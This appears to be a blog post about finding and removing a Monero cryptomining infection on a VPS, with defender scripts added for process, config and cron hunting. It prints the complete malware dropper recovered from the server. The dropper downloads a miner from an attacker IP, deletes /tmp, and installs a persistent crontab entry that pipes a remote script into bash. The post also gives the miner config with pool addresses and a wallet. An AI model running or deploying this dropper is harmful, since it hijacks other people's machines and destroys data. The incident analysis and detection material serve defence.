Emmmm, I actually got hit by a cryptomining infection: pscf
Discovery
My VPS had become hard to reach lately, dropping in and out, so I wanted to redeploy it and set up a proxy while I was at it.
Once that was done I found I was only getting a few tens of KB/s. Ping was 100-odd ms, which should have been fine, so something felt off. Running top showed a pscf process under an ordinary user sitting at over 99% CPU. Damn, I'm in trouble.
Fix 1
Just kill the process, done. The speed didn't change at all; ran top again and, huh? pscf popped back up.
At this point I still didn't suspect malware; I wondered whether the one-click proxy installer had left some file it failed to control properly, an infinite loop or the like.
lsof -c pscf listed the files the running process had open, and one line read /var/tmp/pscf -c /var/tmp/wc.conf
Opening /var/tmp/pscf showed a compiled executable; I couldn't tell what it did.
ls -al /var/tmp/ showed the timestamps didn't add up: I had only set up the proxy today, yet the pscf file was dated 5 days ago.
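The top / lsof step above, generalized into a check a defender can run on any host, as an added example that is not part of the original post: list every process whose executable lives in a world-writable temp directory, which is how the miner here was running. The function and variable names are my own; the ps output at the bottom is a constructed sample modelled on what the post describes, and the live /proc variant reads the real process table.

```shell
#!/bin/sh
# Added example, not from the original post: find processes whose executable
# lives in a world-writable temp directory (/tmp, /var/tmp, /dev/shm).
# Two views: one parses "ps -eo pid,user,args" text so it can be checked
# offline on a constructed sample, the other reads the live /proc table.

TMP_DIRS='^/(var/)?tmp/|^/dev/shm/'

# temp_procs_from_ps [FILE]: from "ps -eo pid,user,args" output (file or
# stdin), print "PID USER EXE" for commands whose executable path is under
# a temp directory. The header line is skipped.
temp_procs_from_ps() {
    awk -v re="$TMP_DIRS" 'NR > 1 && $3 ~ re { print $1, $2, $3 }' "${1:--}"
}

# temp_procs_count [FILE]: number of such processes (0 when clean)
temp_procs_count() {
    temp_procs_from_ps "${1:--}" | wc -l | tr -d ' '
}

# temp_procs_live: the same check against /proc. /proc/PID/exe points at the
# real binary even when argv[0] was faked, and readlink reports " (deleted)"
# when the file was unlinked after launch, so a miner that deletes itself
# from disk still shows up here. Kernel threads have no exe and are skipped.
temp_procs_live() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case "$exe" in
            /tmp/*|/var/tmp/*|/dev/shm/*)
                printf '%s %s\n' "${p#/proc/}" "$exe" ;;
        esac
    done
}

# Constructed sample of "ps -eo pid,user,args", mirroring what the post saw
# (the pscf and pscf3 binaries running from /var/tmp under user "z").
SAMPLE_PS=$(mktemp)
trap 'rm -f "$SAMPLE_PS"' EXIT
cat > "$SAMPLE_PS" <<'EOF'
  PID USER     COMMAND
    1 root     /sbin/init
  987 z        /var/tmp/pscf -c /var/tmp/wc.conf
 1203 root     /usr/sbin/sshd -D
 1477 www-data nginx: worker process
 2042 z        /var/tmp/pscf3 -c /var/tmp/wc.conf
EOF

temp_procs_from_ps "$SAMPLE_PS"
# → 987 z /var/tmp/pscf
# → 2042 z /var/tmp/pscf3
```

On a live host run temp_procs_live as root so every /proc/PID/exe link is readable; a hit is a lead to pull the binary's hash and open files (as the post did with lsof), not proof on its own, since some installers legitimately execute from /tmp briefly.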
Next I looked at the contents of /var/tmp/wc.conf:
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": 5, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"threads": null, // number of miner threads
"pools": [
{
"url": "158.69.133.20:3333", // URL of mining server
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
},
{
"url": "192.99.142.249:3333", // URL of mining server
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
},
{
"url": "202.144.193.110:3333", // URL of mining server
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
}
],
"api": {
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
}
}
I had never seen a mining virus before, but with those parameters and the several mentions of "miner" in there, I felt I'd hit the jackpot.
Went on to /var/tmp/config.json: contents identical to wc.conf.
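The two config files above are worth more than a glance: the pool endpoints and the wallet id are the indicators to block and to search other hosts for. As an added example that is not part of the original post, the script below extracts them. The catch it handles is that xmrig-style configs carry // comments, which a strict JSON parser rejects, so the comments are stripped first. Function names are my own and the embedded config is a constructed sample trimmed from the wc.conf shown above.

```shell
#!/bin/sh
# Added example, not from the original post: pull the pool endpoints and the
# wallet out of an xmrig-style config (wc.conf / config.json). The file uses
# // comments, so they are stripped with sed before values are extracted.

# strip_comments FILE: drop "// ..." trailers. Only a "//" at line start or
# preceded by whitespace counts, so "http://host" inside a quoted value
# survives; a "//" inside a comment body is already past the cut.
strip_comments() {
    sed -E 's#(^|[[:space:]])//.*$##' "$1"
}

# json_string FILE KEY: print every string value stored under KEY, one per line
json_string() {
    strip_comments "$1" \
      | grep -oE "\"$2\"[[:space:]]*:[[:space:]]*\"[^\"]*\"" \
      | sed -E 's/^"[^"]*"[[:space:]]*:[[:space:]]*"//; s/"$//'
}

# pool_count FILE: number of pool endpoints listed
pool_count() { json_string "$1" url | wc -l | tr -d ' '; }

# wallet_count FILE: number of distinct wallet ids (a campaign usually reuses one)
wallet_count() { json_string "$1" user | sort -u | wc -l | tr -d ' '; }

# miner_iocs FILE: block-list-ready report of pool host:port pairs and wallets
miner_iocs() {
    echo "pools:"
    json_string "$1" url | sed 's/^/  /'
    echo "wallets:"
    json_string "$1" user | sort -u | sed 's/^/  /'
}

# Constructed sample trimmed from the wc.conf shown in the post
SAMPLE_CONF=$(mktemp)
trap 'rm -f "$SAMPLE_CONF"' EXIT
cat > "$SAMPLE_CONF" <<'EOF'
{
    "algo": "cryptonight",   // cryptonight (default) or cryptonight-lite
    "log-file": null,        // example: "c:/some/path/xmrig.log"
    "pools": [
        { "url": "158.69.133.20:3333",   // URL of mining server
          "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
          "pass": "x" },
        { "url": "192.99.142.249:3333",  // URL of mining server
          "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
          "pass": "x" },
        { "url": "202.144.193.110:3333", // URL of mining server
          "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
          "pass": "x" }
    ],
    "api": { "port": 0 }     // see https://github.com/xmrig/xmrig/wiki/API
}
EOF

miner_iocs "$SAMPLE_CONF"
```

The pool addresses go straight into an egress block list (port 3333 to these hosts is the miner's only outbound traffic), and the wallet string is the most stable pivot for finding other infected machines, since operators rotate pools and binaries far more often than the address that gets paid.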
So I searched Baidu for pscf, flipped through several pages and found nothing; searching for "mining virus" turned up only minerd and the like, and the fixes were all along the lines of deleting files, but mine came back after deletion. Then another approach came to mind.
Fix 2
If it keeps regenerating, why not simply strip its execute and read permissions?
So: chmod 000 /var/tmp/pscf
kill 21414
top
Hmm, it worked; but checking again a while later, f**k, a pscf process had popped up again,
and ls -al /var/tmp/ showed a pscf3 this time as well. Sigh, I was clearly too naive.
Fix 3
Kept searching Baidu for Linux viruses and the like, and suddenly saw someone mention scheduled tasks. Hmm? That seemed plausible.
crontab -l said this user had no scheduled tasks; moving on, vi /etc/crontab had no jobs either; then vi /var/spool/cron/z revealed that this directory actually held a file for a user whose name starts with z, an account that had never set up any cron jobs. Opened it and sure enough found one entry:
* * * * * wget -q -O http://192.99.142.226:8220/cr.sh
Then wget http://192.99.142.226:8220/cr.sh to pull the script down and have a look:
#!/bin/bash
pkill -f /var/tmp/java
pkill -f /tmp/java
pkill -f zz.sh
pkill -f https
pkill -f 192.99.142.232
pkill -f 46.249.38.186
rm -rf /var/tmp/java
pkill -f 185.222.210.59
pkill -f ririg
rm -rf /tmp
rm -rf /var/tmp/j*
rm -rf /var/tmp/t*
rm -rf /tmp/t*
ps ax | grep /tmp/ | grep -v grep | grep -v 'ppl\|pscf' | awk '{print $1}' | xargs kill -9
ps ax | grep 'wc.conf\|wq.conf' | grep -v grep | grep -v 'ppl\|pscf' | awk '{print $1}' | xargs kill -9
rm -rf /tmp/java
pkill -f pscc
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java*
rm -rf /tmp/java*
chmod 777 /var/tmp/pscf
pkill -f wo.conf
pkill -f gmr
rm -rf /var/tmp/java
rm -rf /var/tmp/ppc
DIR="/var/tmp"
if [ -a "/var/tmp/pscf" ]
then
if [ -w "/var/tmp/pscf" ] && [ ! -d "/var/tmp/pscf" ]
then
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum /var/tmp/pscf | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "pscf OK"
;;
*)
echo "pscf wrong"
pkill -f wc.conf
pkill -f pscf
sleep 4
;;
esac
fi
echo "P OK"
else
DIR=$(mktemp -d)/var/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
else
if [ -d "/var/tmp" ]
then
DIR="/var/tmp"
fi
echo "P NOT EXISTS"
fi
if [ -d "/var/tmp/pscf" ]
then
DIR=$(mktemp -d)/var/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget -O";
fi
f2="192.99.142.226:8220"
downloadIfNeed()
{
if [ -x "$(command -v md5sum)" ]
then
if [ ! -f $DIR/pscf ]; then
echo "File not found!"
download
fi
sum=$(md5sum $DIR/pscf | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "pscf OK"
;;
*)
echo "pscf wrong"
sizeBefore=$(du $DIR/pscf)
if [ -s /usr/bin/curl ];
then
WGET="curl -k -o ";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget --no-check-certificate -O ";
fi
#$WGET $DIR/pscf https://transfer.sh/wbl5H/pscf
download
sumAfter=$(md5sum $DIR/pscf | awk '{ print $1 }')
if [ -s /usr/bin/curl ];
then
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/pscf` > $DIR/var/tmp.txt
fi
;;
esac
else
echo "No md5sum"
download
fi
}
download() {
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/pscf3 | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "pscf OK"
cp $DIR/pscf3 $DIR/pscf
;;
*)
echo "pscf wrong"
download2
;;
esac
else
echo "No md5sum"
download2
fi
}
download2() {
if [ `getconf LONG_BIT` = "64" ]
then
$WGET $DIR/pscf http://192.99.142.226:8220/xm64
fi
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/pscf | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "pscf OK"
cp $DIR/pscf $DIR/pscf3
;;
*)
echo "pscf wrong"
;;
esac
else
echo "No md5sum"
fi
}
if [ ! "$(ps -fe|grep '/var/tmp/pscf'|grep 'wc.conf'|grep -v grep)" ];
then
downloadIfNeed
chmod +x $DIR/pscf
$WGET $DIR/wc.conf http://$f2/wt.conf
nohup $DIR/pscf -c $DIR/wc.conf > /dev/null 2>&1 &
sleep 5
else
echo "Running"
fi
if crontab -l | grep -q "192.99.142.226:8220"
then
echo "Cron exists"
else
echo "Cron not found"
LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.226:8220/cr.sh | bash -sh > /dev/null 2>&1")| crontab -
fi
pkill -f /var/tmp/java
pkill -f /var/tmp/java
pkill -f 192.99.142.232
chmod 777 /var/tmp/pscf
crontab -l | sed '/185.222.210.59/d' | crontab -
Ha! That's it all right. A quick read: it downloads the files, runs the mining program, and adds a cron job. Seen this way the playbook is pretty ordinary.
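The persistence in cr.sh is nothing more than a crontab entry that re-fetches the script every minute and pipes it to bash. As an added example that is not part of the original post, here is a hunt for that pattern over a host's cron sources, written the way the manual search in Fix 3 would be automated (crontab -l for the current user misses the "z" user's spool file, which is exactly what the check below covers). Function and variable names are my own; the crontab at the bottom is a constructed sample containing two benign jobs and the entry the post found.

```shell
#!/bin/sh
# Added example, not from the original post: hunt cron entries that fetch a
# remote script and feed it to a shell, the persistence cr.sh installs with
# "crontab -". Heuristic: a hit means "read this line", not "malware".

# Flag lines that (a) pipe wget/curl output into sh or bash, or (b) fetch a
# URL whose host is a bare IPv4 address. [|] is a literal pipe in the ERE.
CRON_SUSPECT='(wget|curl)[^|]*[|][[:space:]]*(ba)?sh|https?://[0-9]{1,3}(\.[0-9]{1,3}){3}'

# suspicious_cron [FILE]: print the flagged entries of a crontab (file or
# stdin); comment and blank lines are ignored
suspicious_cron() {
    grep -vE '^[[:space:]]*(#|$)' -- "${1:--}" | grep -E "$CRON_SUSPECT"
}

# suspicious_cron_count [FILE]: number of flagged entries (0 when clean)
suspicious_cron_count() {
    suspicious_cron "${1:--}" | wc -l | tr -d ' '
}

# clean_cron FILE: the crontab with flagged entries removed, on stdout.
# Review the output, then install it with "crontab -u USER -" (the post
# edited /var/spool/cron/z by hand, which amounts to the same thing).
clean_cron() {
    grep -vE "$CRON_SUSPECT" "$1"
}

# hunt_cron: run the check over every cron source on this host. The per-user
# spools need root; unreadable files are skipped. "crontab -l" is also tried
# for every account in /etc/passwd, so an unexpected user's jobs are seen.
hunt_cron() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/* /var/spool/cron/crontabs/*; do
        [ -f "$f" ] && [ -r "$f" ] || continue
        suspicious_cron "$f" | sed "s#^#$f: #"
    done
    for u in $(cut -d: -f1 /etc/passwd); do
        crontab -l -u "$u" 2>/dev/null | suspicious_cron | sed "s#^#crontab($u): #"
    done
}

# Constructed sample crontab: two benign jobs plus the entry the post found
SAMPLE_CRON=$(mktemp)
trap 'rm -f "$SAMPLE_CRON"' EXIT
cat > "$SAMPLE_CRON" <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
* * * * * wget -q -O - http://192.99.142.226:8220/cr.sh | bash -sh > /dev/null 2>&1
30 2 * * 0 curl -s https://updates.example.net/agent.sh | sh
EOF

suspicious_cron "$SAMPLE_CRON"
```

The last sample line is flagged too even though it names a domain rather than an IP: fetching a script and piping it to a shell is the behaviour worth a second look regardless of where it comes from. Note that cr.sh itself ends with a crontab edit that deletes a rival's entry, so a cron file can be rewritten under you while you are cleaning it; run the hunt again after the miner process is gone, as the post did with top.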
Fix 4
- vi /var/spool/cron/z**, delete the cron entry and save the file;
- kill 21969, the pscf process;
- rm /var/tmp/pscf /var/tmp/wc.conf /var/tmp/config.json
Checked top again: no pscf process, and CPU usage back to normal.
Afterword
Although the CPU problem is solved and the executable deleted, how this miner's cron job got into the system in the first place is the next thing to track down.
While searching Baidu, some people said there might be an SSH backdoor left behind or similar; I checked .ssh/authorized_keys and /etc/ssh/sshd_config and found nothing wrong. Will keep watching tomorrow.
After killing the miner the proxy speed immediately doubled. Happy.
Looked up the IP while I was at it: Canada. Of course.